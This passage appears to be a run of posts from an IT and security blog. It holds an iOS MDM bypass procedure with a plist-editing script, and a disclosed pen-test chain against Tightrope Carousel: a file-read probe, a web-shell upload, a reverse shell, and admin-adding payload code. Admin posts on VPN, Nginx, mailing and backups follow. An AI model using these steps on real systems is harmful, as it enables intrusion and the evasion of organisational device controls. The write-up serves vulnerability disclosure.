iOS 13 MDM/DEP Bypass (using Checkra1n jailbreak)

Before anyone comments about this being a bad idea, let it be known that I’m not responsible for any trouble you may get in for doing this. I’m part of the hacking team at my organization, so this is the type of thing I’m supposed to be doing, but unless you are too, I’d probably advise against this.

Using Checkra1n on my iPhone 8 running iOS 13.2.2 (downgraded from 13.2.3), I have found a way to bypass organizational MDM (forced through DEP). In my test case I was using Blackberry’s MDM services, but I believe this should work for other MDM providers as well.

I’m going to leave these instructions relatively vague. If you can follow them, go for it; if you can’t, you probably should not be jailbreaking your corporate device.

NOTE: This is on a device that has been freshly wiped, or at least had the contents of “/var/containers/Shared/SystemGroup/” removed. If you already have MDM applied to your device, try wiping the contents of that directory and rebooting. It’ll probably reset a lot of settings, but that seemed to remove MDM for me (and allow me to prevent its application) after a reboot.


  1. Jailbreak your device using Checkra1n.
  2. On your phone, walk through the “Welcome” wizard, set up your Wi-Fi, and then when you get to the screen that says “Your organization requires policies” (not verbatim, but that’s the general message), move on to Step 3.
  3. Connect to your device over SSH via iproxy (checkra1n exposes SSH over USB on port 44; e.g. run “iproxy 2222 44”, then “ssh -p 2222 root@localhost”; the username is root, the password is alpine).
  4. Using SSH on the device, navigate to “/var/containers/Shared/SystemGroup/”.
  5. Ensure the following 2 files are present: “CloudConfigurationDetails.plist” and “CloudConfigurationSetAsideDetails.plist”.
  6. If not already installed, install the “nano” text editor on your device via “apt” (or use vi, if that’s there by default, which I assume it is).
  7. Using your text editor, modify both “CloudConfigurationDetails.plist” and “CloudConfigurationSetAsideDetails.plist”, making the following changes to both files:
    • NOTE: If any of these variables are not present, you can try just leaving them missing. If that doesn’t work, add them with the values I’ve specified.
    • Change the value of the integer “IsMDMUnremovable” to 0.
    • Change the value of the bool “IsMandatory” to false.
    • Change the value of the bool “IsSupervised” to false.
  8. Restart your device (you can either re-jailbreak it using Checkra1n or just let it boot normally; either should be fine).
  9. When booted back up, walk through the “Welcome” wizard again, and this time when you get to the corporate policy screen, click through it. You should have the option to ignore the policies and not apply them.
  10. That’s it. After you reboot again, the device will still be activated but without any MDM.
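For reference, the step-7 edits can also be scripted rather than made by hand in nano/vi. Below is a minimal sketch using Python’s plistlib, intended to be run against copies of the two plists pulled off the device; I haven’t verified this on-device, and it assumes the plists parse cleanly:

```python
# Sketch: the step-7 edits applied with plistlib instead of a text editor.
# Run against copies of the plists pulled off the device over SSH/scp.
import plistlib

def neuter_mdm_flags(path):
    with open(path, "rb") as f:
        data = plistlib.load(f)        # handles both XML and binary plists
    data["IsMDMUnremovable"] = 0       # integer 0, per step 7
    data["IsMandatory"] = False        # bool false
    data["IsSupervised"] = False       # bool false
    with open(path, "wb") as f:
        plistlib.dump(data, f)

# Usage (file names from the post):
#   neuter_mdm_flags("CloudConfigurationDetails.plist")
#   neuter_mdm_flags("CloudConfigurationSetAsideDetails.plist")
```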

NOTE: I wrote this shortly after figuring this process out. It’s possible that the policies will attempt to re-apply periodically and/or after an iOS upgrade, but I don’t know for sure. I’ll edit this post if I find any further info.

Edit: Just found this post, which says that hex-editing the Checkra1n app to increase the max_supported_version number to iOS 13.2.3 should allow devices on the most recent iOS release to be jailbroken without needing to downgrade.

Edit2: I just upgraded to 13.2.3 and my MDM-bypass is still fine (I was not prompted to re-enroll after upgrading).

Vulnerabilities in Tightrope Media Systems Carousel <= (and likely newer)

While on a recent penetration test, I discovered a digital signage system made by Tightrope Media Systems (TRMS). The client was using this software on an appliance provided by TRMS, which was essentially an x86 Windows 10 PC. I was able to gain access to the web interface of this system due to an unchanged default administrator password. I found references online to a vulnerability in this version of the system that allows for an arbitrary file read (LFI) via the RenderingFetch API function (CVE-2018-14573). By reading the CVE and the API documentation, I was able to successfully read files on the system.

Local File Inclusion (LFI) via the RenderingFetch API
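For illustration, exploiting a read primitive like this typically amounts to a single GET request with a traversal sequence in the file-path parameter. The endpoint path and parameter name below are hypothetical placeholders, not the real API surface; take those from the CVE writeup and the Carousel API documentation:

```python
# Sketch of probing an arbitrary-file-read API like RenderingFetch
# (CVE-2018-14573). The endpoint path ("/api/RenderingFetch") and the
# parameter name ("path") are placeholder assumptions, not the real API.
try:
    from urllib.parse import urlencode   # Python 3
except ImportError:
    from urllib import urlencode         # Python 2

def build_probe_url(base, file_path):
    # A traversal sequence walks out of the directory the API serves from.
    return "%s/api/RenderingFetch?%s" % (base, urlencode({"path": file_path}))

url = build_probe_url("https://signage.example.com",
                      "..\\..\\..\\Windows\\win.ini")
```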

I attempted to read protected files, such as the SQL database of the application itself (expecting it to fail, as even if the user account did have read permission to this file, the file would have been locked). Eventually though, I found that the system included a handy database backup function which included the ability to email the backed up file to an arbitrary address. I emailed a copy of the database to myself, but found that due to a bug in the system, it did not include the actual db I wanted, just the secondary db that did not include any user authentication details.

After this disappointing result, I set out to find other ways to compromise the system. I explored the Carousel webui and found something interesting. This interface allows for the uploading of “bulletins”, or in other words, items to display on the digital signage screen.

Carousel bulletin management page

I analyzed the bulletin import mechanism and found that it accepts ZIP files for uploading. When I attempted to upload a random file, however, it was rejected as not properly formatted. To identify the expected format, I exported an existing bulletin and opened the resulting ZIP file on my system to examine its structure. Inside the archive is a folder called “Pages”, containing another folder named with a random GUID. I inserted two malicious .ASPX files into that folder and then attempted to upload the file.

Malicious ASPX files inside of exported bulletin ZIP file

After this, I was able to successfully upload the ZIP file to the system. I identified the GUID of the newly created (via import) bulletin by looking at the URL attached to the preview image on the webui. To clarify, the GUID inside of the ZIP file is not the GUID once it’s imported into the system. I then attempted to navigate to the URL of the malicious ASPX files I had inserted into the ZIP, but they were not found.

Frustrated, I analyzed the original ZIP file with unzip on Linux, along with 7-Zip on Windows. It appeared that the tools I used to add files to the archive wrote entry paths with the forward-slash separator (“/”), while the original (Windows-created) entries used the backslash (“\”). This caused the files I added to be discarded by the server upon upload. I was eventually able to see this clearly by opening the file in a hex editor.

Bad ZIP file with improperly-formatted additional file

I decided to manually change the “/” to a “\” for the files I had added to the archive, using a hex editor: select the wrong character, type the right one, save the file. “Surely this will not work”, I thought.
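As an aside, the hex-editor step can be avoided entirely by writing the added entry names with backslash separators in the first place. Here’s a sketch using Python’s zipfile (the entry path and GUID are illustrative); assigning ZipInfo.filename directly sidesteps zipfile’s habit of rewriting os.sep in entry names on Windows:

```python
# Sketch: build a bulletin ZIP whose added entries use backslash path
# separators, matching the Windows-created entries the server expects.
# The entry path and GUID below are illustrative, not from the real export.
import io
import zipfile

def add_backslash_entry(zf, entry_name, payload):
    # ZipInfo's constructor rewrites os.sep to "/", so assign the name
    # directly to keep the backslashes intact on any platform.
    info = zipfile.ZipInfo("placeholder")
    info.filename = entry_name
    zf.writestr(info, payload)

buf = io.BytesIO()   # stand-in for a copy of the exported bulletin ZIP
with zipfile.ZipFile(buf, "w") as zf:
    add_backslash_entry(
        zf,
        "Pages\\00000000-0000-0000-0000-000000000000\\shell.aspx",
        b'<%@ Page Language="C#" %>')
```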

ZIP file after modifying the path-separator character of the newly added files with a hex editor

After modifying the ZIP file with the hex editing tool, I uploaded it to Carousel and found it listed in the main bulletin listing (as I had with my first attempt). I then selected the bulletin and inspected the URL of the preview image (to determine the GUID and full-path to the directory where my files had been imported).

Malicious bulletin archive successfully imported

After identifying the path to the imported files, I attempted to navigate to my malicious ASPX files in that directory. Sure enough, they loaded! I was able to successfully execute commands on the system via a web shell. I first attempted a standard directory listing of the C:\ drive, and then ran whoami.

Directory listing of C:\ drive
whoami showing application being run in context of IIS AppPool\Carousel

Running commands via the web shell became a bit tiresome, so I decided to upload a Powershell file that would connect a remote interactive shell back to my attacking system.

Downloading reverse shell to target system via Powershell
Reverse shell successfully downloaded to target system

I started a listener on my attacking machine and executed the reverse shell Powershell script via the web shell, which caused the targeted system to connect back to me and provide a fully-interactive command prompt.

With that, I had achieved arbitrary file upload and remote code execution on this system. This has been classified as CVE-2018-18930.

Despite having fully-interactive access to this system, I was still running in the context of a restricted account, so I set out looking for a way to elevate my privileges. I noticed that uploaded files were saved to C:\TRMS\Web\Carousel\Media, which meant the restricted IIS account had write access to at least that folder. I navigated to the C:\TRMS directory and saw that an installed application (as opposed to the web app) appeared to be running from another directory under C:\TRMS. I issued a command to view the services running on the system and the user accounts they run under, and found two services with “Carousel” in the name running under the SYSTEM account.

Two Carousel services running as SYSTEM

After identifying these services, I issued another command to identify the path at which the executables these services used were located.

Paths of the Carousel services

I then executed a command to show the permissions (ACL) on the service executables, to determine whether I could modify these files. Sure enough, the “NT Authority\Authenticated Users” group had “Modify” permissions on the service exe file.

“NT Authority\Authenticated Users” with “Modify” permissions to Carousel.Service.exe

I built a small exe file in C# that would execute various commands I compiled into the application, such as a command to create a user account. I renamed the original exe file and uploaded my malicious exe in its place.

Malicious exe (Carousel.Service.exe) uploaded, after renaming original
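The C# payload itself isn’t reproduced here, but its effect was equivalent to the following sketch (Python used for illustration only; the account name and password are placeholders, not the ones from the test):

```python
# Illustration of what the replacement service exe does when the service
# starts: create a local user, then add it to the local Administrators group.
# The real payload was a compiled C# exe; this is a stand-in sketch.
import subprocess

def build_add_admin_cmds(user, password):
    # The two commands the payload runs, as argument lists
    return [
        ["net", "user", user, password, "/add"],
        ["net", "localgroup", "administrators", user, "/add"],
    ]

def run_payload(user, password):
    for cmd in build_add_admin_cmds(user, password):
        subprocess.call(cmd)   # runs as SYSTEM when launched by the service
```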

I now needed to restart the service. Unfortunately, the user account I was running under did not have permission to restart services on this system. I found that it did, however, have the ability to restart the server. I ran a command to reboot, knowing that this would achieve the same thing as restarting the service (albeit with slightly higher risk, as the entire system would go down temporarily). After the system came back up, I ran a command to view the local users and administrators on the system and found that my account had been created and was now a local admin!

Rebooting system to restart service
User account “gfsec” created and added to the local admins group

Now armed with a local user account belonging to the admin group, I attempted to connect directly to SMB from my machine. I found, however, that the configuration of this machine did not allow inbound connections to essentially anything except ports 80 and 443. Turning off the firewall didn’t seem to help. I ended up uploading Ngrok to the system. Ngrok is a free application/service for bypassing NAT and firewalls, generally used by web developers who don’t have the ability to open holes in their firewall and forward ports. The application runs on the target system, connects out to the Ngrok service, and tunnels a local port of your choosing; you are then given a randomly generated hostname and port number through which you can reach the target system from anywhere in the world. I ran this on the Carousel system and pointed it at the local SMB port, 445.

Ngrok running, attached to local port 445

After making the SMB port available to remote systems, I was able to authenticate over SMB with Metasploit and conveniently take full control of the system. This privilege-escalation vulnerability has been assigned CVE-2018-18931.

While exploring the system, I eventually uncovered the remnants of a system image deployment. When Windows systems are imaged, administrators can use an Unattend.xml file to control various settings on the new system. This includes local accounts and passwords. I found that the Unattend.xml file left on the system included the creation of a local admin account (along with the password). This default password has been assigned CVE-2018-18929.

Tightrope Media Systems was notified of these vulnerabilities in early November 2018. They responded on 11/13/2018 stating that they believed these bugs were fixed, and requested my client’s contact info to ensure they were on the latest version. They have not followed up with me to discuss the specifics of these vulnerabilities. Now that approximately 90 days have elapsed since the original disclosure, this information is being made publicly available.

UPDATE (2/7/19): Tightrope Media Systems has reached out to me regarding this post and the vulnerabilities discussed. They apologized for the way the situation was handled on their end and have stated their intention to review how they triage reported security issues. The CEO personally thanked me for my contribution to their security and committed to improving their internal processes. This is a lot better than being threatened with litigation, as has happened to me in the past with other vendors, so I applaud TRMS for their response after this came to their attention (again). If you are a customer, they have released a bulletin regarding the CVEs along with a workaround to mitigate some of the disclosed issues. They are planning to release a patch on 2/8/19.

Solution for Subnet Conflict Between VPN and LAN

We had an issue at work where VPN users were having intermittent difficulty reaching servers due to a subnet conflict, i.e. the VPN network is 192.168.1.X and so is the LAN they’re connecting from. It displayed itself in a strange way: application connections would fail repeatedly, but after pinging the servers in question (the first ping would fail, the next three would work), the application would work for a while. I finally developed a solution. Here’s what I did: create a Powershell script that identifies the IP address of the VPN connection, then creates static routes for the conflicting subnets (192.168.1.0/24, plus another common home subnet that is also in use at the office) going out the VPN connection’s IP with a lower metric number than everything else. Then, set a scheduled task to run automatically when the VPN connection occurs (task triggered by event). Save the script as “Fix_VPN.ps1” at the root of the C drive and import the scheduled task (you may need to make sure that the event I have triggering this is also being generated by whatever VPN solution you’re using; we’re using built-in RAS (SSTP)).

Powershell Script:

$ErrorActionPreference = 'silentlycontinue'
$ip = $null
$nics = [System.Net.NetworkInformation.NetworkInterface]::GetAllNetworkInterfaces()
foreach ($nic in $nics) {
   if($nic.Name -like "*VPN*"){
      $props = $nic.GetIPProperties()
      $addresses = $props.UnicastAddresses
      foreach ($addr in $addresses) {
         $ip = $($addr.Address.IPAddressToString)
      }
   }
}
if($ip -ne $null){
   # Adjust the subnets below to match the ranges that conflict in your environment
   route delete 192.168.0.0 | Out-Null
   route delete 192.168.1.0 | Out-Null
   route add 192.168.0.0 mask 255.255.255.0 $ip METRIC 1 | Out-Null
   route add 192.168.1.0 mask 255.255.255.0 $ip METRIC 1 | Out-Null
}

Scheduled Task:

   <?xml version="1.0" encoding="UTF-16"?>
    <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
      <!-- Trigger fires on the RAS connection event (Rasman event 20267);
           the action runs the script saved at C:\Fix_VPN.ps1 -->
      <Triggers>
        <EventTrigger>
          <Enabled>true</Enabled>
          <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="System"&gt;&lt;Select Path="System"&gt;*[System[Provider[@Name='Rasman'] and EventID=20267]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>
        </EventTrigger>
      </Triggers>
      <Principals>
        <Principal id="Author">
          <RunLevel>HighestAvailable</RunLevel>
        </Principal>
      </Principals>
      <Actions Context="Author">
        <Exec>
          <Command>powershell.exe</Command>
          <Arguments>-ExecutionPolicy Bypass -File C:\Fix_VPN.ps1</Arguments>
        </Exec>
      </Actions>
    </Task>

Nginx (Reverse SSL Proxy) with ModSecurity (Web App Firewall) on CentOS 7 (Part 1)

Today I’ll demonstrate how to install the Nginx webserver/reverse proxy, with the ModSecurity web application firewall, configured as a reverse SSL proxy, on CentOS 7.  This is useful in scenarios where you are terminating incoming SSL traffic at a centralized location and are interested in implementing a web application firewall to protect the web servers sitting behind the proxy.  This setup can also support multiple sites (i.e. different host names) using Server Name Indication (SNI) for SSL.  If multiple sites are being protected you will need a different SSL certificate for each site (unless a wildcard or SAN certificate will suffice for the sites in question, in which case SNI is not used).  There is an abundance of information available online showing how to do this on Ubuntu/Debian, but not for CentOS.  In Part 1 (this post) we’ll compile everything, install Nginx, and configure a reverse SSL proxy, and in Part 2 we’ll configure ModSecurity.

The first step is to deploy a fresh VM with CentOS 7.  We are using the x64 version, but I don’t see why the x86 version would be any different.

Log on to the server and either elevate to a root shell or execute all commands below using sudo.

Here we are installing the EPEL (Extra Packages for Enterprise Linux) repository to provide access to some of the prerequisite packages we need.  After that we update the system and install all of the required packages.

yum install epel-release       
yum update       
yum install gc gcc gcc-c++ pcre-devel zlib-devel make wget openssl-devel libxml2-devel libxslt-devel gd-devel perl-ExtUtils-Embed GeoIP-devel gperftools gperftools-devel libatomic_ops-devel perl-ExtUtils-Embed libtool httpd-devel automake curl-devel       

After installing all of the prerequisite packages we create a user named “nginx” for the daemon to run as.  We also set the login shell to “nologin” to prevent a compromised account from gaining access to a real shell.

useradd nginx       
usermod -s /sbin/nologin nginx       

Now let’s download ModSecurity to the /usr/src/ directory, untar it, and change to the unpacked folder.  At the time of this writing the latest version was 2.9.0.  Downloads for the latest version are available on the ModSecurity website.

cd /usr/src/       
tar xzvf modsecurity-2.9.0.tar.gz       
cd modsecurity-2.9.0/       

Now, inside the source directory, run configure with the “enable-standalone-module” option, and then make the module.

./configure --enable-standalone-module       
make       

After building the ModSecurity module, move back to the /usr/src/ directory, download Nginx, untar it, and then enter the unpacked directory.  The latest version of Nginx at the time of this writing was 1.9.7.  Newer versions can be found on the nginx website.

cd /usr/src/       
tar xzvf nginx-1.9.7.tar.gz       
cd nginx-1.9.7/       

After navigating to the extracted directory run configure, then make, and then make install.  The “add-module” option set with configure will point to the nginx/modsecurity/ directory which should be inside of the extracted ModSecurity directory from earlier.  The default behavior of nginx is to install to /usr/local/nginx, but in the command below we’re changing the location of where some files are stored. First, the binary “nginx” is being saved directly in /usr/sbin/ to make things easier dealing with $PATH. We’re setting the conf path to the /etc/nginx/ directory, the PID path to the /var/run/ directory, and the log paths to /var/log/nginx/. I have two reasons for changing these paths: 1 – to keep the respective folders in the standard locations, and 2 – to allow SELinux to function using default rules. There are default SELinux rules related to /sbin/nginx, /etc/nginx/, and /var/log/nginx/, and I’ve found it much easier to work with SELinux if I just keep everything possible in the locations that are already predefined. There will be more later showing how to add SELinux rules to account for the directories that aren’t predefined.

./configure --user=nginx --group=nginx --with-pcre-jit --with-debug --with-ipv6 --with-http_ssl_module --add-module=/usr/src/modsecurity-2.9.0/nginx/modsecurity --sbin-path=/usr/sbin/nginx --conf-path=/etc/nginx/nginx.conf --pid-path=/var/run/ --error-log-path=/var/log/nginx/error.log --http-log-path=/var/log/nginx/access.log
make       
make install       

Now let’s setup a systemd service to allow Nginx to autostart with the server.  In the first block of code we’ll navigate to the proper directory, then we’ll create a file to tell systemd what to do.  The second block of code will contain the contents of the file we created before that.

cd /usr/lib/systemd/system
nano nginx.service

# nginx signals reference doc:
[Unit]
Description=A high performance web server and a reverse proxy server
After=network.target

[Service]
Type=forking
# This must match the --pid-path passed to configure
PIDFile=/var/run/nginx.pid
ExecStartPre=/usr/sbin/nginx -t -q -g 'daemon on; master_process on;'
ExecStart=/usr/sbin/nginx -g 'daemon on; master_process on;'
ExecReload=/usr/sbin/nginx -g 'daemon on; master_process on;' -s reload
ExecStop=/bin/kill -s QUIT $MAINPID

[Install]
WantedBy=multi-user.target


Now we need to edit the conf file for Nginx.  Before we do that though we create two folders: sites-available and sites-enabled, just like in Apache, to hold our vhosts.

mkdir /etc/nginx/sites-available
mkdir /etc/nginx/sites-enabled
nano /etc/nginx/nginx.conf

Change the config file to what’s listed below. NOTE: For “worker_processes” set the number to the number of cores you wish to dedicate to the server.

user nginx;
worker_processes  1;

events {
    worker_connections  1024;
}

http {
    include       mime.types;
    default_type  application/octet-stream;
    sendfile        on;
    keepalive_timeout  65;
    gzip  on;
    include /etc/nginx/sites-enabled/*;
}

Here we generate a Diffie-Hellman parameter file larger than the commonly used 1024-bit size. We’ll do 4096 bits; note that this can take quite a while to generate.

cd /etc/ssl/certs
openssl dhparam -out dhparam.pem 4096

Now we need to create a folder to hold our SSL files. Inside of that folder we’ll create subfolders for each vhost’s certs. Though not shown below, place your certificate and key files in the vhost SSL directory. We also create a vhost config file in the sites-available directory.

mkdir /etc/nginx/ssl
mkdir /etc/nginx/ssl/localhost
nano /etc/nginx/sites-available/ssl.conf

Add the following to the file just created. Make sure for the “ssl_certificate” and “ssl_certificate_key” lines you point to the proper locations. Set the “server_name” line to the hostname of your server (make sure it matches the SSL certificate). Set the “proxy_pass” line to point to the server you’re proxying to. In the example below we’re connecting to port 80 locally, but in most cases this would be a separate server. If you have several SSL certificates and want to define one of the vhosts as default, add “default_server” on the “listen” line, between the port number and semicolon.

server {
        listen   443;

        server_name localhost;
        ssl                  on;
        ssl_certificate      /etc/nginx/ssl/localhost/localhost.crt;
        ssl_certificate_key  /etc/nginx/ssl/localhost/localhost.key;

        ssl_session_timeout  5m;

        ssl_protocols  TLSv1 TLSv1.1 TLSv1.2;
        ssl_ciphers 'EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH';
        ssl_prefer_server_ciphers on;
        ssl_session_cache shared:SSL:10m;
        ssl_dhparam /etc/ssl/certs/dhparam.pem;

        location / {
          proxy_pass http://localhost:80;
          proxy_set_header X-Real-IP  $remote_addr;
          proxy_set_header X-Forwarded-For $remote_addr;
          proxy_set_header Host $host;
          proxy_set_header X-Forwarded-Proto $scheme;
          proxy_read_timeout 90;
        }
}
Create a symlink from the site(s) in the sites-available directory to the sites-enabled directory to activate the sites. Then test to make sure the config files don’t contain any errors.

ln -s /etc/nginx/sites-available/ssl.conf /etc/nginx/sites-enabled/ssl.conf
nginx -t

Assuming nginx -t doesn’t return any errors, everything should be all ready to go!  Enable the service, start it, then verify it’s running.

systemctl enable nginx.service
systemctl start nginx.service
systemctl status nginx.service

If you need to open up the firewall to allow incoming traffic, use the commands below:

firewall-cmd --add-port=443/tcp --permanent
firewall-cmd --reload

Python – Mass-Mail w/ Attachment

I wrote a Python script today to mass-mail files to our clients. Our wonderful ERP system screwed up again, leaving us with PDFs of the information we needed to send out, the filenames being prefixed with a unique ID per-recipient. Rather than re-generate all documents and have them sent out properly (which likely wouldn’t have happened due to bugs in the system from a recent upgrade) we wrote this script to mail out the documents we already had. We created a CSV file with two columns: column one has the unique filename prefix, column two has the corresponding recipient’s email address.

import csv
import os
import smtplib
import mimetypes
from email.mime.multipart import MIMEMultipart
from email import encoders
from email.mime.audio import MIMEAudio
from email.mime.base import MIMEBase
from email.mime.image import MIMEImage
from email.mime.text import MIMEText

def readCSV():
    clientCSVList = []
    #set below to the CSV file you want to read.  Two columns:
    #1 - file prefix to search
    #2 - email address to send file to
    try:
        with open("csvFile", 'rb') as csvfile:
            clientReader = csv.reader(csvfile, delimiter=',')

            missing = 0
            for clientNum, email in clientReader:
                found = False
                for file in os.listdir("folder_with_files"):
                    if file.startswith(clientNum):
                        #store the full path so the file can be opened later
                        clientCSVList.append([clientNum, email, os.path.join("folder_with_files", file)])
                        found = True
                if not found:
                    missing += 1
                    print clientNum + " " + email

        print clientCSVList
        print "Missing: " + str(missing)
    except Exception as e:
        print "Exception: " + str(e.args)
        return

    for client in clientCSVList:
        #try each client separately so one failure doesn't stop the whole run
        try:
            send_email("[email protected]", client[1], "Email Subject Here", "Email body text here", client[2])
            print client[0] + " Success"
        except Exception as e:
            print "Exception: " + str(e.args)
            print client[0] + " Failure"

def send_email(sender, receiver, subject, message, fileattachment=None):
    emailfrom = sender
    emailto = receiver
    fileToSend = fileattachment
    username = "smtp_username"
    password = "smtp_password"

    msg = MIMEMultipart()
    msg["From"] = emailfrom
    msg["To"] = emailto
    msg["Subject"] = subject
    #attach the body text as its own MIME part so it shows up in the message
    msg.attach(MIMEText(message))

    ctype, encoding = mimetypes.guess_type(fileToSend)
    if ctype is None or encoding is not None:
        ctype = "application/octet-stream"

    maintype, subtype = ctype.split("/", 1)

    if maintype == "text":
        fp = open(fileToSend)
        # Note: we should handle calculating the charset
        attachment = MIMEText(fp.read(), _subtype=subtype)
        fp.close()
    elif maintype == "image":
        fp = open(fileToSend, "rb")
        attachment = MIMEImage(fp.read(), _subtype=subtype)
        fp.close()
    elif maintype == "audio":
        fp = open(fileToSend, "rb")
        attachment = MIMEAudio(fp.read(), _subtype=subtype)
        fp.close()
    else:
        fp = open(fileToSend, "rb")
        attachment = MIMEBase(maintype, subtype)
        attachment.set_payload(fp.read())
        fp.close()
        encoders.encode_base64(attachment)
    attachment.add_header("Content-Disposition", "attachment",
                          filename=os.path.basename(fileToSend))
    msg.attach(attachment)

    server = smtplib.SMTP("server:25") #insert SMTP server:port in quotes
    server.login(username, password)   #remove if your server doesn't require auth
    server.sendmail(emailfrom, emailto, msg.as_string())
    server.quit()

def main():
    readCSV()

if __name__ == "__main__":
    main()

Manual WordPress Backup (on Windows)

I was running the WP-DB-Backup plugin for this blog up until recently, when it suddenly stopped working.  I tried troubleshooting a little bit before I said “screw it, I’ll back it up myself”.  My solution was to write a script that will create a dump of my MySQL database, add it and my WordPress directory to a password-protected 7-Zip file, then email it to my GMail account and automatically archive it for safe keeping.  This was all created in one batch file.  The steps I took to perform these actions are as follows:

1. For the first few lines of the script, we’re going to set variables to set a date and time stamp on our archive, that way we’ll know exactly where it came from (and won’t overwrite anything if we choose to store the backup locally).

For the first lines of the script, write:

set T=%time:~0,5%
set UniqueDir=%date:/=-% %T::=-%

For the next line, we’re going to set the location of the backup file.  Type out:

set backupfile="c:\path to backup\%UniqueDir%.7z"

2. Create the MySQL dump.  To do this, add the line

"C:\Program Files\MySQL\MySQL Server 5.1\bin\mysqldump.exe" --user=MySQL-user-here --password=pw-here blog-db-name-here > "c:\path to backup\blog_name.sql"

3. Create the 7-Zip archive by archiving the SQL file we created along with the WordPress directory of your site.  Start by downloading and installing 7-Zip.  Then, add the line:

"C:\Program Files\7-Zip\7z.exe" a -t7z -pPASSWORD-HERE %backupfile% C:\inetpub\wwwroot\website_name\wordpress "c:\path to backup\blog_name.sql"

This creates the password-protected archive named Date + Time.7z at the location you specify in the “backupfile” variable.  The archive is protected with PASSWORD-HERE (and please note the lack of a space between the “-p” switch and the password).  The archive includes the wordpress directory specified and the blog_name.sql file specified.  You can add whatever other files you’d like after that, if desired.

4. Now it’s time to email the archive.  To do this, we need to download the program “SendEmail”.  This is a command line utility that will allow us to send email messages via the command line (or batch file, in this case).  Once you’ve downloaded it, extract the contents of the zip file to c:\SendEmail.  Now we’re going to add a line to our batch file that says:

"c:\sendemail\sendEmail.exe" -f [email protected] -t [email protected] -u "Blog Backup for %UniqueDir%" -m "See attached for backup" -s smtp-server-here -xu smtp-user-here -xp smtp-password-here -a %backupfile%

You can exclude the -xu and -xp switches if you don’t need to authenticate with your mail server to send messages.

5. This part is optional.  To remove the backup files from the local machine, we add two lines to delete the SQL dump file and the 7-Zip archive we’ve created:

del "c:\path to backup\blog_name.sql"
del %backupfile%

That’s it!  Now all that’s left to do is create a scheduled task using the Windows Task Scheduler to run this every evening (or however often you feel like).  This will create a SQL dump, 7-Zip it with the WordPress directory, email it to a specified address, then delete the local copy of the backup.  A full version of the script is below:

set T=%time:~0,5%
set UniqueDir=%date:/=-% %T::=-%

set backupfile="c:\path to backup\%UniqueDir%.7z"

"C:\Program Files\MySQL\MySQL Server 5.1\bin\mysqldump.exe" --user=MySQL-user-here --password=pw-here blog-db-name-here > "c:\path to backup\blog_name.sql"

"C:\Program Files\7-Zip\7z.exe" a -t7z -pPASSWORD-HERE %backupfile% C:\inetpub\wwwroot\website_name\wordpress "c:\path to backup\blog_name.sql"

"C:\sendemail\sendEmail.exe" -f [email protected] -t [email protected] -u "Blog Backup for %UniqueDir%" -m "See attached for backup" -s smtp-server-here -xu smtp-user-here -xp smtp-password-here -a %backupfile%

del "c:\path to backup\blog_name.sql"
del %backupfile%

Unable To Install Microsoft Security Essentials <Solved>

I’ve just spent the past hour or so fighting a co-worker’s personal computer, trying to get Microsoft Security Essentials to re-install (she had originally installed v1 of MSE, and when the v2 came out not too long ago and it attempted to upgrade, apparently it hosed her antivirus installation).  Her machine is running XP SP3 32-bit.

The original error code we received was 0x80070002 when trying to run the v2 installer.  I tried to run the v1 installer (downloaded from Microsoft’s site), hoping to re-write whatever had become corrupted (as Add/Remove Programs didn’t show MSE as being installed at all).  However, that didn’t do anything, and it ended up failing to install as well.  From there, I went into Program Files and renamed the Microsoft Security Essentials folder so that the installation would be able to write to a fresh folder.  That didn’t work.  Then, I entered the Registry…

In the Registry, I searched for “Security Essentials” and proceeded to delete every key (the Registry’s term for its folder-like containers) that contained any items referencing Security Essentials.  This took a while.  I re-ran the installation after that, to no avail.

I then went digging around the Application Data folder (C:\Documents and Settings\All Users\Application Data) and deleted the Microsoft Security Essentials folder and files.  I also went back into the Registry and searched for “Microsoft Antimalware” and again deleted every key containing items referencing the string I searched for.

At one point, after ripping enough items out of the Registry, the error message I received changed.  It became 0x80070643, then 0x80070648, and finally 0x80070645.  I then found a post describing two registry keys that could be causing problems (they appear to tell the installer to upgrade rather than perform a fresh install).  Once I removed these two keys and rebooted, the installation succeeded.  Below are the two keys I removed.

HKEY_CLASSES_ROOT > Installer > UpgradeCodes > 1F69ACF0D1CF2B7418F292F0E05EC20B

— Right-click on 1F69ACF0D1CF2B7418F292F0E05EC20B and delete the key.

HKEY_LOCAL_MACHINE > SOFTWARE > Microsoft > Windows > CurrentVersion > Installer > UpgradeCodes > 1F69ACF0D1CF2B7418F292F0E05EC20B

— Right-click on 1F69ACF0D1CF2B7418F292F0E05EC20B and delete the key.

I’m not sure everything I did was necessary to achieve the desired result.  I’d recommend removing the last two keys mentioned first, and if that doesn’t work, try everything else.  As always, keep in mind that removing information from the Registry is potentially dangerous to your system’s health, so make a backup of the Registry before proceeding.
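The same two keys can be removed from an (administrative) command prompt with reg.exe.  A sketch of the equivalent commands; the export lines back each key up to a .reg file first, in case you need to roll back:

```bat
rem Back up both keys before deleting them
reg export "HKCR\Installer\UpgradeCodes\1F69ACF0D1CF2B7418F292F0E05EC20B" hkcr-upgradecode.reg
reg export "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UpgradeCodes\1F69ACF0D1CF2B7418F292F0E05EC20B" hklm-upgradecode.reg

rem Delete the keys that make the installer attempt an upgrade instead of a fresh install
reg delete "HKCR\Installer\UpgradeCodes\1F69ACF0D1CF2B7418F292F0E05EC20B" /f
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UpgradeCodes\1F69ACF0D1CF2B7418F292F0E05EC20B" /f
```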

Exchange 2007 Calendar Sharing Problem

“You do not have sufficient permission to perform this operation on this object. See the folder contact or your system administrator.”

This message haunted me for a number of months.  I had originally set up calendar sharing permissions among my management team to allow easy viewing of each other’s schedules.  Doing this by logging into each user’s Outlook and manually sharing the calendar is a total PITA.  I wanted to allow the users to open specific calendars at will, without having to involve each user in the process.

To set these permissions, I used PFDAVAdmin, a free tool from Microsoft that allows you to manipulate Exchange data.  I created a mail-enabled security group in Exchange and added all the users to it.  I then went through with PFDAVAdmin and gave this group “Reviewer” permissions on each user’s calendar within their mailbox.  This worked fine for a while.  Then, all of a sudden, I started receiving the message quoted at the beginning of this article when new users opened shared calendars they supposedly had permission to view.
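Creating the mail-enabled security group can also be done from the Exchange Management Shell rather than the console.  A sketch; the group name, OU, and member names are placeholders, and the exact parameter set may vary by Exchange service pack:

```powershell
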